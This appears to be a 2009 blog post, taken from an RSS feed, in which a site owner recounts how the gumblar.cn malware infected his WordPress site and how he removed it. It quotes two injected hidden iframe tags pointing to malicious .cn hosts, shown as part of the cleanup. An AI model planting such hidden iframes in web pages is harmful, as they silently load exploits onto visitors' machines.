Pakzilla » security http://www.pakzilla.com A blog on Programming, Web and Technology Sat, 04 Feb 2012 22:25:40 +0000 en hourly 1 http://wordpress.org/?v=3.3.1 How to protect your website from gumblar.cn infection http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/ http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/#comments Wed, 06 May 2009 06:14:12 +0000 Tahir Akram http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/
  • How to remove the border of Facebook page like box
  • Easy way to create your WordPress mobile website
  • Things you should do when changing your WordPress host
    • ]]>     Yesterday one of my websites got infected by a suspicious malware gumblar.cn. This website contains several exploits and trojans that can harm your system. How it starts its infection is to invoke Adobe Acrobat Reader on your machine. I found after browsing my infected site, Acrobat Reader process was running in Task Manager.

    According to Google Safe Browsing Service

    What happened when Google visited this site?
    Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-05, and the last time suspicious content was found on this site was on 2009-05-05.
    Malicious software includes 2341 scripting exploit(s), 6 trojan(s).

    This site was hosted on 1 network(s) including AS42831 (UKSERVERS).

    gumblar_cn_infection
    I found some of php files were altered by adding a iframe at the end of the page. My infected files were <my-url>/wp-content/themes/<my-theme-dir>/index.php and <my-url>/wp-admin/index.php and in same directory index-extra.php. I didnt found any other file which was infected by this.

    I manually removed this embedded iframe  <iframe src=”http://liteautotop .cn/ts/in.cgi?mozila” width=2 height=4 style=”visibility: hidden”></iframe>  and every things works fine.

    If you have some type of information about this infection, people will highly appriciate who are messing arround the internet about the solution of this problem.

    Update (5/11/09): I am able to remove this malware from my blog and WordPress admin site.

    Removal

    • Removed image.php file from all images folder. image.php infection only found in ‘image’ folder. Make sure you didn’t remove the orignal image.php file. If your orignal file infected, only remove malicious code
    • Looked for iframe code added on the top or bottom of php page and remove it. I found this iframe which I removed. <iframe src=”http: //bigtruckstopseek .cn/ts/in.cgi?banner2″ width=2 height=4 style=”visibility: hidden”>
    • Checked all PHP, HTML and JS  files for added anonymous Java Script methods. I found all JS files infected in wp-include directory
    • Put httpdoc directory permission to 755
    • Scaned my computer with Malwarebytes’ Anti-Malware, which identified several threats and removed
    • Updated my AVG Anti Virus
    • Changed my FTP password
    • I did all this manual code removal activity from my Pleask control panel

    Please fell free to make comment and your suggestions to make more security measures to prevent such threats.

    Related posts:

    1. How to remove the border of Facebook page like box
    2. Easy way to create your WordPress mobile website
    3. Things you should do when changing your WordPress host

    ]]>     http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/feed/ 22